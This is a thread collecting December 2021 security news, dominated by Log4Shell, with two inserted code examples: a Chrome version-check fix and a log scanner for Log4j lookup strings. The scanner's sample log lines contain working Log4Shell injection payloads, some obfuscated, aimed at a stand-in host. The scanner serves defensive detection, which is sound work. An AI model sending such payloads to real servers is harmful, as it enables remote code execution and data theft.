This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
Tomi Engdahl says:
China suspends deal with Alibaba for not sharing Log4j 0-day first with the government https://thehackernews.com/2021/12/china-suspends-deal-with-alibaba-for.html
China’s internet regulator, the Ministry of Industry and Information Technology (MIIT), has temporarily suspended a partnership with Alibaba Cloud, the cloud computing subsidiary of e-commerce giant Alibaba Group, for six months on account of the fact that it failed to promptly inform the government about a critical security vulnerability affecting the broadly used Log4j logging library.
Tomi Engdahl says:
Dridex malware trolls employees with fake job termination emails https://www.bleepingcomputer.com/news/security/dridex-malware-trolls-employees-with-fake-job-termination-emails/
A new Dridex malware phishing campaign is using fake employee termination emails as a lure to open a malicious Excel document, which then trolls the victim with a season’s greeting message.
Tomi Engdahl says:
Microsoft Confirms ‘NotLegit’ Azure Flaw Exposed Source Code Repositories
https://www.securityweek.com/microsoft-confirms-notlegit-azure-flaw-exposed-source-code-repositories
Microsoft has quietly started notifying some Azure customers that a serious security vulnerability in the Azure App Service has caused the exposure of hundreds of source code repositories.
Microsoft’s confirmation comes more than two months after it was reported by Israeli cloud security startup Wiz and weeks after Redmond quietly patched the flaw and released notifications to “a limited subset of customers” believed to be at risk.
Tomi Engdahl says:
Poland Rejects Accusations of ‘Political’ Spyware Use
https://www.securityweek.com/poland-rejects-accusations-political-spyware-use
Poland on Tuesday rejected accusations that it had used Pegasus spying software for political ends after a top lawyer opposed to the current government said he had been targeted.
“The suggestion that Polish services used operational methods for political ends is unjustified,” said Stanislaw Zaryn, spokesman for the ministry in charge of the secret services.
Roman Giertych, a lawyer involved in several cases against the ruling Law and Justice (PiS) party, told Gazeta Wyborcza that Poland was using the spyware “to fight the democratic opposition”.
Tomi Engdahl says:
After A Brazen $400 Billion Unemployment Funds Heist, The U.S. Secret Service Seized Back The Money From Criminals
https://www.forbes.com/sites/jackkelly/2021/12/22/after-a-brazen-400-billion-unemployment-funds-heist-the-us-secret-service-seized-back-the-money-from-criminals/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Valerie&sh=41890fca6f97
Estimates ranging from $100 billion to over $400 billion have been stolen from Covid-19 unemployment and other pandemic relief programs. The United States Labor Department reported that nearly $90 billion in unemployment benefits alone could have been paid improperly due to fraudulent activities, according to PBS NewsHour.
The U.S. Secret Service released data on Tuesday on its efforts to investigate acts of fraud that exploit Covid-19 relief funds. Investigations have resulted in the seizure of millions of dollars and have assisted in the return of approximately $2 billion.
Tomi Engdahl says:
Log4j (CVE-2021-44228) RCE Vulnerability Explained
https://www.youtube.com/watch?v=0-abhd-CLwQ
Walking through how the log4j CVE-2021-44228 remote code execution vulnerability works and how it’s exploited.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/
Tomi Engdahl says:
FBI: Another Zoho ManageEngine Zero-Day Under Active Attack
https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/
Tomi Engdahl says:
Security firm Blumira discovers major new Log4j attack vector
A basic Javascript WebSocket connection can trigger a local Log4j remote code attack via a drive-by compromise. Wonderful. Truly wonderful.
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
Tomi Engdahl says:
Apache releases new 2.17.0 patch for Log4j to solve denial of service vulnerability
The Apache Software Foundation published a new Log4j patch late on Friday after discovering issues with 2.16.
https://www.zdnet.com/article/apache-releases-new-2-17-0-patch-for-log4j-to-solve-denial-of-service-vulnerability/
Tomi Engdahl says:
New Log4j Attack Vector Discovered
Meanwhile, Apache Foundation releases third update to logging tool in 10 days to address yet another flaw.
https://www.darkreading.com/application-security/researchers-uncover-new-attack-vector-for-log4j-flaw
Tomi Engdahl says:
New Local Attack Vector Expands the Attack Surface of Log4j Vulnerability
https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html
Cybersecurity researchers have discovered an entirely new attack vector that enables adversaries to exploit the Log4Shell vulnerability on servers locally by using a JavaScript WebSocket connection.
“This newly-discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability,” Matthew Warner, CTO of Blumira, said. “At this point, there is no proof of active exploitation. This vector significantly expands the attack surface and can impact services even running as localhost which were not exposed to any network.”
Tomi Engdahl says:
How to test if your Linux server is vulnerable to Log4j
https://www.techrepublic.com/article/how-to-test-if-your-linux-server-is-vulnerable-to-log4j/
Tomi Engdahl says:
Apache’s Fix for Log4Shell Can Lead to DoS Attacks
https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/
Tomi Engdahl says:
Original Fix for Log4j Flaw Fails to Fully Protect Against DoS Attacks, Data Theft
Organizations should upgrade ASAP to new version of logging framework released Tuesday by the Apache Foundation, security experts say.
https://www.darkreading.com/application-security/original-fix-for-log4j-flaw-fails-to-fully-protect-against-dos-attacks-data-theft
Tomi Engdahl says:
Log4Shell in broad use: Fukushima moment for cybersecurity
https://cybernews.com/security/log4shell-in-broad-use-fukushima-moment-for-cybersecurity/
Tomi Engdahl says:
https://www.uusiteknologia.fi/2021/12/16/log4j-ongelma-laajenee-paivityksia-jo-tyokaluihin/
Tomi Engdahl says:
Google Tool Joins Ferocious Hunt for Log4j Bug
Updated “fuzzing” service now sleuthing after the Internet’s latest (and greatest?) vulnerability
https://spectrum.ieee.org/log4j-google?utm_campaign=RebelMouse&socialux=facebook&share_id=6840811&utm_medium=social&utm_content=IEEE+Spectrum&utm_source=facebook
A major bug in a widely-used piece of open source software called Log4j has thrown the IT world into pandemonium. The hole was not even made public a month ago (as of this writing), and yet it’s already been classified by Internet security analysts as among the biggest vulnerabilities in cybersecurity history.
By some estimates, for instance, some 93 percent of enterprise cloud computing environments around the world are affected. According to sources quoted in the Financial Times, as of Dec. 14, more than 1.2 million cyberattacks (at a rate of as much as 100 attacks per minute) had been observed—with no likely end in sight for, according to these sources at least, “months to come.”
Tomi Engdahl says:
Mars helicopter mission (which Apache says is powered by Log4j) overcomes separate network glitch to confirm new flight record
Ingenuity clocks up 30 minutes flying in the Martian skies
https://www.theregister.com/2021/12/16/ingenuity_mars_helicopter_log4j_network/
NASA has revealed that Ingenuity – the experimental helicopter sent to Mars with the Perseverance Rover – has clocked up a whole half-hour of flight in the Red Planet’s meanly thin atmosphere.
The ‘copter passed the thirty-minute mark during its 17th flight, on December 5, which sets a new record for the space agency.
But NASA was unsure of the craft’s status because of what the US agency has described as “an unexpected cutoff to the in-flight data stream as the helicopter descended toward the surface at the conclusion of its flight.”
NASA SAYS ITS MARS HELICOPTER DOES NOT HAVE THE LOG4J SECURITY FLAW
https://futurism.com/the-byte/mars-helicopter-log4j-flaw
Tomi Engdahl says:
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips
https://thehackernews.com/2021/12/researchers-uncover-new-coexistence.html
Tomi Engdahl says:
Bugs in billions of WiFi, Bluetooth chips allow password, data theft
https://www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/
Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it’s possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device’s Bluetooth component.
Modern consumer electronic devices such as smartphones feature SoCs with separate Bluetooth, WiFi, and LTE components, each with its own dedicated security implementation.
However, these components often share the same resources, such as the antenna or wireless spectrum.
Tomi Engdahl says:
‘Extremely bad’ vulnerability found in widely used logging system
The Log4Shell exploit gives attackers a simple way to execute code on any vulnerable machine
https://www.theverge.com/2021/12/10/22828303/log4j-library-vulnerability-log4shell-zero-day-exploit
Tomi Engdahl says:
Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet
Minecraft is the first, but certainly not the last, app known to be affected.
https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
Tomi Engdahl says:
Malicious Notepad++ installers push StrongPity malware
https://www.bleepingcomputer.com/news/security/malicious-notepad-plus-plus-installers-push-strongpity-malware/
Tomi Engdahl says:
Cyberattack forces supermarket Spar to close some stores
The retailer has been forced to close a number of stores following what it describes as an “online” attack.
https://www.zdnet.com/article/a-cyber-attack-has-forced-supermarket-spar-to-close-some-stores/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/google-disrupts-massive-glupteba-botnet-sues-russian-operators/
Tomi Engdahl says:
Log4Shell Vulnerability
Take urgent action and proactively hunt for Log4Shell behaviors
https://www.splunk.com/en_us/cyber-security/log4shell-log4j-response-overview.html
Defending Against the Log4Shell Vulnerability
The Log4Shell vulnerability in the popular Apache Log4j 2 is a critical zero-day vulnerability that enables bad actors to perform remote code execution (RCE). Log4j is used in frameworks such as Apache Struts 2, Apache Solr, Apache Druid and Apache Flink.
In many instances, system admins may not be aware that Log4j is being used in their environments, leaving thousands of applications and third-party services at risk.
Use GitHub data in Splunk to find Log4j in your projects.
https://youtu.be/oASCxWDTAQo
Tomi Engdahl says:
Apache found critical bugs in httpd web server
https://cybernews.com/news/apache-found-critical-bugs-in-httpd-web-server/
Apache, whose name has been in the news for the past two weeks due to the severe vulnerability in the logging library, issued yet another update. This time, it has nothing to do with the Log4j vulnerability (dubbed Log4Shell).
Apache issued the patch addressing two CVE-numbered flaws affecting the httpd server. According to the cybersecurity company Sophos, which published a detailed report on the topic, Apache’s httpd is a large and capable server with myriad combinations of modules and options, making it both powerful and dangerous at the same time.
Fortunately, Sophos noted, the open-source httpd product receives constant attention from its developers, getting regular updates that bring new features along with critical security patches.
The two vulnerabilities that got fixed this time:
CVE-2021-44790: Possible buffer overflow when parsing multipart content in mod_lua of Apache HTTP Server 2.4.51
CVE-2021-44224: Possible NULL dereference or SSRF in forward proxy configurations in Apache HTTP Server 2.4.51 and earlier.
“These bugs might not be exposed in your configuration because they are part of optional run-time modules that you might not actually be using. But if you are using these modules, whether you realize it or not, you could be at risk of server crashes, data leakage, or even remote code execution,” Sophos said.
Tomi Engdahl says:
NVIDIA discloses applications impacted by Log4j vulnerability
https://www.bleepingcomputer.com/news/security/nvidia-discloses-applications-impacted-by-log4j-vulnerability/
NVIDIA has released a security advisory detailing what products are affected by the Log4Shell vulnerability that is currently exploited in a wide range of attacks worldwide.
After a thorough investigation, NVIDIA has concluded that the Log4j vulnerabilities do not impact the following products:
GeForce Experience client software
GeForceNOW client software
GPU Display Drivers for Windows
L4T Jetson Products
SHIELD TV
Log4Shell impact
While NVIDIA consumer applications are unaffected, some NVIDIA enterprise applications include Apache Log4j and need to be updated:
Nsight Eclipse Edition versions below 11.0 are vulnerable to CVE-2021-33228 and CVE-2021-45046 and are fixed in version 11.0 or later.
NetQ is vulnerable to CVE-2021-33228, CVE-2021-45046, and CVE-2021-45105 on versions 2.x, 3.x, and 4.0.x. As such, users are advised to upgrade to NetQ 4.1.0 or later.
vGPU Software License Server is impacted by CVE-2021-33228 and CVE-2021-45046 on versions 2021.07 and 2020.05 Update 1. The recommended practice in these cases is to follow this mitigation guide.
NVIDIA also warns that CUDA Toolkit Visual Profiler includes Log4j files but that the application is not using them. An updated version is being released in January 2022 to remove these files.
Tomi Engdahl says:
https://wiki.eclipse.org/Eclipse_and_log4j2_vulnerability_(CVE-2021-44228)
Tomi Engdahl says:
Windows 10 RCE: The exploit is in the link
https://positive.security/blog/ms-officecmd-rce
Tomi Engdahl says:
The ‘most serious’ security breach ever is unfolding right now. Here’s what you need to know.
Much of the Internet, from Amazon’s cloud to connected TVs, is riddled with the log4j vulnerability, and has been for years
https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/
On Dec. 9, word of a newly discovered computer bug in a hugely popular piece of computer code started rippling around the cybersecurity community. By the next day, nearly every major software company was in crisis mode, trying to figure out how their products were affected and how they could patch the hole.
“The log4j vulnerability is the most serious vulnerability I have seen in my decades-long career,” Jen Easterly, U.S. Cybersecurity and Infrastructure Security Agency director, said in a Thursday interview on CNBC.
Reports differ when it comes to who first raised the alarm about the vulnerability. Some people say it surfaced in a forum dedicated to the video game Minecraft. Others point to a security researcher at Chinese tech company Alibaba. But experts say it’s the biggest software vulnerability of all time in terms of the number of services, sites and devices exposed.
Software bugs crop up all the time. Why is this one different?
The fact that log4j is such a ubiquitous piece of software is what makes this such a big deal. Imagine if a common type of lock used by millions of people to keep their doors shut was suddenly discovered to be ineffective. Switching a single lock for a new one is easy, but finding all the millions of buildings that have that defective lock would take time and an immense amount of work.
Log4j is part of the Java programming language, which is one of the foundational ways software has been written since the mid-90s. Huge swaths of the computer code that modern life runs on use Java and contain log4j. Cloud storage companies such as Google, Amazon and Microsoft, which provide the digital backbone for millions of other apps, are affected. So are giant software sellers whose programs are used by millions, such as IBM, Oracle and Salesforce. Devices that connect to the Internet such as TVs and security cameras are at risk as well.
In the Minecraft video game, it’s as easy as typing a line of malicious code into the public chat box during a game. On Twitter, some people changed their display names to strings of bad code, Wired reported.
The vulnerability also gives hackers access to the heart of whatever system they’re trying to get into, cutting past all the typical defenses software companies throw up to block attacks. Overall, it’s a cybersecurity expert’s nightmare.
So how is the tech industry responding?
Computer programmers and security experts have been working night and day since the vulnerability was publicized to fix it in whatever piece of software they’re responsible for. At Google alone, more than 500 engineers had been going through reams and reams of code to make sure it was safe, according to one employee. That process was being repeated at all kinds of tech companies, spawning an entire new genre of memes from coders lamenting the hellish week they’ve been through.
“Some of the people didn’t see sleep for a long time, or they sleep like three hours, four hours and wake back up,” Ashkenazi said. “We were working around-the-clock. It’s a nightmare since it was out. It’s still a nightmare.”
Are hackers already taking advantage of it?
Hackers have been working just as hard as the security experts to exploit log4j before the bug gets patched. Cybersecurity software company Check Point said in a blog post that it saw hackers send out 60 different variations of the original exploit in a single 24-hour period. Hackers have already tried to use it to get into nearly half of all corporate networks around the world, Check Point said. Most of the hacking has focused on hijacking computers to run bitcoin mining software.
Though the bug was present for years, it’s unlikely criminal hackers have known about it until now, because if they had, security experts would have spotted it being used before.
That doesn’t mean that more sophisticated government hackers, such as those working for the United States, Russia, Israel or China, haven’t used it before though.
On Dec. 17, cybersecurity firm AdvIntel said it detected well-known ransomware gang Conti scanning the web for log4j and then launching an attack of its own.
And not everyone will fix the problem in the first place. Getting an entire industry to update a specific piece of software quickly is next to impossible. Many companies won’t end up doing it, or will think they aren’t affected when really they are.
That means log4j could be a problem for years to come.
The best thing regular computer users can do is make sure the apps they use are updated to their most recent versions.
For the most part, consumers should just wait and let the experts fix their software programs.
“Sit back, take a deep breath. It’s not the end of the world,” Malik said. “It’s going to be very busy the next few days for security folks.”
Correction: A previous version of this story incorrectly stated that NASA’s Ingenuity helicopter used log4j.
Tomi Engdahl says:
Google warns that NSO hacking is on par with elite nation-state spies
ForcedEntry is “one of the most technically sophisticated exploits.”
https://arstechnica.com/information-technology/2021/12/google-warns-that-nso-hacking-is-on-par-with-elite-nation-state-spies/
Tomi Engdahl says:
https://arstechnica.com/information-technology/2021/12/google-warns-that-nso-hacking-is-on-par-with-elite-nation-state-spies/
Tomi Engdahl says:
Google Issues Warning For 2 Billion Chrome Users
https://www.forbes.com/sites/gordonkelly/2021/12/23/google-chrome-update-warning-new-chrome-version-100/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Valerie&sh=196b366d3c35
Chrome remains under (unprecedented) attack from all sides this year, and now Google has confirmed a new problem that Chrome’s two billion+ users need to know about.
Google revealed the news via its Chromium Bug tracker, the codebase for Chrome, confirming that the browser’s next major landmark release is set to break a number of websites around the world. And there’s nothing you can do about it.
The problem boils down to version numbers. The official build of Chrome is currently on version 96, while ‘Chrome Canary’ — the early access developer build — is already on version 99. When Chrome hits 100, affected websites will stop loading.
The reason for this is these sites check the version of Chrome visiting the site, but website design software like Duda only check the first two digits. The check is for security reasons to stop older, unsupported versions of Chrome from visiting (version 40 and older is a common cut-off point) and Chrome 100 will be read as ‘Chrome 10’ and blocked.
Finding a fix is tricky and time is running out. From the perspective of website owners, many will not know they are affected until it is too late with potentially significant fallout. From Google’s perspective, Chrome also continues to race through version numbers as the company develops its browser at a breakneck pace. For example, Chrome 95 only launched in October.
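The two-digit check the article describes is easy to reproduce. As an added example, not code from Duda, Google or the Forbes article, the broken parser sits beside a correct one; the User-Agent strings and the cut-off of 41 (the article cites “version 40 and older” as a common cut-off) are constructed for illustration.

```javascript
// Added example, not code from Duda, Google or the article: why a version check
// that reads only two digits misclassifies Chrome 100, and a correct parser.

// Constructed User-Agent strings for the comparison (not captured traffic).
const UA_CHROME_40  = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36';
const UA_CHROME_96  = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36';
const UA_CHROME_100 = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36';

// "Version 40 and older" is the cut-off the article cites; the exact number is assumed here.
const MIN_SUPPORTED_MAJOR = 41;

// Broken: captures exactly two digits after "Chrome/", so "Chrome/100" parses as 10.
function chromeMajorTwoDigit(ua) {
  const m = /Chrome\/(\d{2})/.exec(ua);
  return m ? parseInt(m[1], 10) : null;
}

// Correct: take the whole run of digits up to the first dot and compare as a number.
function chromeMajor(ua) {
  const m = /Chrome\/(\d+)\./.exec(ua);
  return m ? parseInt(m[1], 10) : null;
}

// Gate used by the site: is the visitor allowed in under the given parser?
// Non-Chrome or unparseable agents return false here only to keep the comparison
// simple; a real gate would fall through to its checks for other browsers.
function isAllowed(ua, parseMajor) {
  const major = parseMajor(ua);
  return major !== null && major >= MIN_SUPPORTED_MAJOR;
}

// Side-by-side summary for one agent string.
function compareParsers(ua) {
  return {
    twoDigit: { major: chromeMajorTwoDigit(ua), allowed: isAllowed(ua, chromeMajorTwoDigit) },
    correct:  { major: chromeMajor(ua),         allowed: isAllowed(ua, chromeMajor) },
  };
}

for (const ua of [UA_CHROME_40, UA_CHROME_96, UA_CHROME_100]) {
  console.log(ua.match(/Chrome\/[\d.]+/)[0], compareParsers(ua));
}
```

A regression test against a synthetic `Chrome/100.0.0.0` agent string, like the one above, is the cheap way for a site owner to find this before the release lands; the fix is to compare parsed integers rather than a fixed-width prefix.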
Tomi Engdahl says:
“It’s Open Source!”, “It’s robust and secure”, “With the Java platform we can do anything”
Merry Christmas from
/Log4j
JavaZone 2012: The Java Heist
https://m.youtube.com/watch?v=HXvm76e2X1Q&feature=youtu.be
Tomi Engdahl says:
CyberNews caught up with Peter Rydzynski, principal threat Analyst for IronNet Cybersecurity, to discuss how the situation has developed over the past two weeks.
Log4j: protecting only remotely accessible servers is a mistake – opinion
https://cybernews.com/security/log4j-protecting-only-remotely-accessible-servers-is-a-mistake-opinion/?utm_source=facebook&utm_medium=social&utm_campaign=cybernews&utm_content=post
It’s been almost two weeks since the severe vulnerability in the Log4j logging library was publicly disclosed. We are starting to see more severe consequences, but the problem hasn’t yet peaked.
Since the beginning of the public debate on the vulnerability, dubbed Log4Shell, experts have been speculating that this is the Fukushima moment for cybersecurity. They anticipate that the consequences might be severe, but we might not learn about the magnitude of this cybersecurity earthquake for months.
It’s been almost two weeks since the severe vulnerability in the Log4j logging library was discovered. What happened during that period? How bad is it?
Firstly, the reason it is so severe is partially because of the ubiquitous use of Java applications all over the place, and, additionally, the use of the Log4j library, specifically, within Java applications. Given the fact that it is used in so many locations, and then combined with the fact that, in this case, the exploit was incredibly trivial. You could even show the exploit strain to someone who wasn’t in computer science or computer security. They could probably understand basically what it does and how it can figure it to do something they want it to do. Very simple to execute. Additionally, the delivery mechanism, because you could deliver the exploit from remote areas of the internet, also made it incredibly severe.
As all things go, patch processes took place, we had a fixed version of Log4j that was released, and almost immediately, we found out that version was still vulnerable. And so, it was a typical game of every time you think you are good, and you’ve patched up to a particular version that’s secure, you are still not secure. And we are chasing this vulnerability all the way to the point where they actually deactivated the feature entirely. That vulnerable feature has now been completely removed from the Log4j library.
Does the fact that it is disabled prevent you from cyberattacks?
Just because there is a secure version doesn’t mean it is easy to get to that version, and it also doesn’t mean that it is easy for you to know where all of the Log4j applications are in your network.
What happened during these past weeks? We saw crypto miners starting to exploit the vulnerability, nation-states jumping in, ransomware gangs eyeing the vulnerability, and even the Belgian defense ministry falling victim to a cyberattack allegedly caused by this vulnerability.
I think that more will definitely come to light as time goes on because, with these kinds of exploitations, you see very rapid adoption by botnets and crypto mining. And we definitely saw that. We saw things attempting to spread across the internet like Mirai that have done that for a long time using similar exploits. They have picked this up quickly. But nation-states and more sophisticated actors need a little bit of time to work these new exploits into their operations and for those things to come to light. I think we are going to see more of that. We are seeing now that the Conti ransomware group has adopted this exploit in their operations, so that’s another concern: that ransomware is absolutely a viable delivery here. Because given the nature of the exploit, you are often going to land on a server that isn’t being monitored as heavily as maybe a host end-point. Additionally, that may have more broad access into the network and move laterally very easily from that landing point on a server. Ransomware is a strong concern here.
But even those companies that have patched might still be vulnerable as the attacker might already be inside their network, right?
Another concern here is not just that an attacker had already exploited your server and moved on to other locations within your network before you were able to patch. Still, a bigger concern is actually on the side of information stealing. People may think that they are ok because they didn’t see any subsequent command-and-control activity or lateral movement, but what they didn’t realize is that the attacker used the DNS mechanism that’s capable within this exploit and exfiltrated sensitive environment variables that include passwords that an attacker can use later to come back and attack your network at their pleasure.
There are a lot of angles to this. Just patching and thinking that you are safe after having a server exposed to the internet is not a good idea.
You’ve mentioned that sophisticated threat actors might need time to fit this vulnerability into their attack vectors. On average, it takes 14 weeks even to detect an intruder. Does it mean that we are yet to learn about the significance and severity of this vulnerability, as well as the actual damage it caused?
I believe that they are ongoing. At the moment, we’ve already had indications that nation-states are leveraging this exploit, but I will say that we might never learn about these kinds of attacks in full scope. But yes, these things take time. If you look at any of the reports out of Mandiant, FireEye, and other organizations that do incident response for the government, you will notice that these reports typically come six to nine months after the activity was discovered by defensive companies, let alone when the activity started in those networks. These things take time, and, additionally, we may not actually hear the full scope of them as well.
You should essentially have plans to ensure that you have the appropriate processes documented so that when you discover a threat actor in your network, you can take action. Furthermore, you need to have monitoring systems that pay attention to the internal portions of your network. You can’t just watch the edge, and you can’t just watch the firewall and say, ‘hey, we saw these Log4j exploits, but we’ve patched them, and we are good,’ and then not take a look inside and start monitoring traffic, hosts, looking for lateral movement, looking for the second-stage activities that are going to happen after an exploit is successful on your edge.
Again, this is something you should be doing all the time, not just because Log4j is happening now, but you can see how important it is to have adopted this strategy all the time when Log4j happens.
Do you think enough companies are patching the vulnerability? We saw with the Microsoft Exchange Servers that there were still tens of thousands of unpatched servers weeks after discovering the bug.
I think the attention on this particular incident has been incredible. I think that a good majority of people are patching. But I will speculate on as far as my fears go. People think the edges are the priority, which they are. They believe that anything that can be hit from the internet should be patched, but the inside can wait. And what happens is sometimes those things would get forgotten or even intentionally overlooked because they will be assumed as a risk that is not big enough to take action on. I hope that doesn’t happen because this is a goldmine for an attacker who’s already in the network.
It might be tempting for defenders to say, ‘that’s not remotely accessible, no one’s going to attack that server, it’s only accessible to internal employees, it’s no big deal.’ In reality, an attacker could very simply access and exploit a server inside the network. You might think that it is not a priority, but I think it is a priority across every portion of your network, even the most sensitive enclaves that are restricted access only.
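The Splunk note earlier in the thread urges proactively hunting for Log4Shell behaviour, and Rydzynski’s point above is that a DNS-based lookup may have carried data out even where no later command-and-control traffic was seen, so the original lookup string in request logs is often the only artefact left to find. As an added example, not code from Splunk, IronNet or the Apache project, here is a small Node.js triage scanner run over constructed web-server log lines. The log format, the hostnames (reserved `.invalid` names) and the subset of lookup forms it normalises (percent-encoding, `${lower:}`/`${upper:}` and the `${name:-default}` form) are assumptions for illustration.

```javascript
// Added example, not code from Splunk, Apache or IronNet: a triage scanner that
// flags web-server log lines carrying a Log4j "${jndi:...}" lookup string.
// It normalises two things a plain grep misses: percent-encoded requests and
// nested lookups such as ${lower:j} that rebuild the keyword at log time.
// The sample lines are constructed; hostnames use the reserved .invalid TLD.

const SAMPLE_LOG_LINES = [
  '203.0.113.7 - - [10/Dec/2021:08:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Dec/2021:08:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://c2.example.invalid/a}"',
  '203.0.113.9 - - [10/Dec/2021:08:13:44 +0000] "GET /?q=${${lower:j}ndi:dns://c2.example.invalid/a} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
  '203.0.113.9 - - [10/Dec/2021:08:14:02 +0000] "GET /login?user=%24%7Bjndi%3Armi%3A%2F%2Fc2.example.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
];

// Percent-decode a line; a malformed escape leaves the line unchanged rather than aborting the scan.
function safeDecode(line) {
  try { return decodeURIComponent(line); } catch (e) { return line; }
}

// Resolve innermost ${...} lookups whose value is a literal: ${lower:X}, ${upper:X}
// and the ${name:-default} form (treated as its default). Repeat until nothing
// changes so nested layers collapse one at a time. Lookups that cannot be
// resolved statically (jndi, env, ...) are left exactly as they are.
function collapseLookups(s) {
  const innermost = /\$\{([^${}]*)\}/g;
  let prev;
  do {
    prev = s;
    s = s.replace(innermost, (whole, body) => {
      let m;
      if ((m = /^lower:(.*)$/i.exec(body))) return m[1].toLowerCase();
      if ((m = /^upper:(.*)$/i.exec(body))) return m[1].toUpperCase();
      if ((m = /^[^-]*:-(.*)$/.exec(body))) return m[1];
      return whole;
    });
  } while (s !== prev);
  return s;
}

// Return the JNDI scheme (ldap, dns, rmi, ...) if the line carries a lookup, else null.
function jndiScheme(line) {
  const normalized = collapseLookups(safeDecode(line));
  const m = /\$\{\s*jndi\s*:\s*([a-z]+)/i.exec(normalized);
  return m ? m[1].toLowerCase() : null;
}

// Scan a whole log and report 1-based line numbers with the scheme seen.
function scanLog(lines) {
  const hits = [];
  lines.forEach((line, i) => {
    const scheme = jndiScheme(line);
    if (scheme) hits.push({ lineNo: i + 1, scheme });
  });
  return hits;
}

console.log(scanLog(SAMPLE_LOG_LINES));
```

A hit is a starting point, not proof of compromise: the lookup only fires if a vulnerable Log4j version actually logged that field, so the next step is to check which host handled the request, whether it resolved or connected to the named host, and, for the `dns` scheme in particular, whether the query carried anything beyond a fixed hostname.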
Tomi Engdahl says:
Half-Billion Compromised Credentials Lurking on Open Cloud Server
https://threatpost.com/half-billion-compromised-credentials-cloud-server/177202/
A quarter-billion of those passwords were not seen in previous breaches that have been added to Have I Been Pwned.
According to the National Crime Agency’s National Cyber Crime Unit in the U.K., nearly 586 million sets of credentials had been collected in a compromised cloud storage facility, free for the taking by any cybercrime yahoo who happened to stop by.
The credentials were a mixed bag in terms of sources, and it’s not clear how these passwords became compromised.
Tomi Engdahl says:
https://thehackernews.com/2021/12/new-mobile-network-vulnerabilities.html?m=1
Researchers have disclosed security vulnerabilities in handover, a fundamental mechanism that undergirds modern cellular networks, which could be exploited by adversaries to launch denial-of-service (DoS) and man-in-the-middle (MitM) attacks using low-cost equipment.
The “vulnerabilities in the handover procedure are not limited to one handover case only but they impact all different handover cases and scenarios that are based on unverified measurement reports and signal strength thresholds,” researchers Evangelos Bitsikas and Christina Pöpper from the New York University Abu Dhabi said in a new paper. “The problem affects all generations since 2G (GSM), remaining unsolved so far.”
Tomi Engdahl says:
China “Data Trap” – One way is to own the market. Tik Tok is now visited more than Google or Facebook.
“…nation-state actors like China, which seeks access to strategic data and seeks to use it to develop a toolkit against its adversaries. Last month, MI6 chief Richard Moore described the threat of China’s “data trap”: “If you allow another country to gain access to really critical data about your society,” Moore argued, “over time that will erode your sovereignty, you no longer have control over that data.” And most governments are only just beginning to grasp this threat.”
https://techcrunch.com/2021/12/26/how-to-avoid-falling-into-chinas-data-trap/
Tomi Engdahl says:
Examining Log4j Vulnerabilities in Connected Cars and Charging Stations https://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html
Since its disclosure on Dec. 9, a vast number of articles have been written on the remote code execution (RCE) vulnerability in the library Apache Log4j, a reflection of its impact. Further expanding the attack surface, the vulnerability, dubbed Log4Shell, affects even embedded devices that use this library. In this report, we focus on the devices or properties found in or used for cars, specifically chargers, in-vehicle infotainment (IVI) systems, and “digital remotes” for opening cars.
Tomi Engdahl says:
Apple fixes macOS security flaw behind Gatekeeper bypass https://www.bleepingcomputer.com/news/apple/apple-fixes-macos-security-flaw-behind-gatekeeper-bypass/
Apple has addressed a macOS vulnerability that unsigned and unnotarized script-based apps could exploit to bypass all macOS security protection mechanisms even on fully patched systems. Once malicious script-based apps targeting the bypass flaw (CVE-2021-30853) are launched on a target’s system, they can be used by attackers to download and deploy second-stage malicious payloads. Apple has addressed this vulnerability in macOS 11.6 through a security update released in September 2021 that adds improved checks.
Tomi Engdahl says:
Noora, 35, nearly lost 6,000 euros in an instant: this is how an insidious scam spreading in Finland works
https://www.iltalehti.fi/tietoturva/a/726d5a13-3123-4060-bf50-0f3a7048f090
A great many scam messages are circulating in the names of various banks.
The scam messages usually arrive by email and claim that the recipient urgently needs to fix some detected problem or provide an important signature. These messages are used to phish for personal data, credit card details and online banking credentials. 35-year-old Noora Juvonen also received such a message. The message, sent in the name of OP, had the subject “security alert” and said that an important message had arrived in Juvonen’s secure mailbox, which could be viewed via a login link.
Tomi Engdahl says:
Stealthy BLISTER malware slips in unnoticed on Windows systems https://www.bleepingcomputer.com/news/security/stealthy-blister-malware-slips-in-unnoticed-on-windows-systems/
Security researchers have uncovered a malicious campaign that relies on a valid code-signing certificate to disguise malicious code as legitimate executables. One of the payloads, which the researchers called Blister, acts as a loader for other malware and appears to be a novel threat that enjoys a low detection rate.
Tomi Engdahl says:
NSO spyware used to hack Polish politicians, Khashoggi’s wife, others
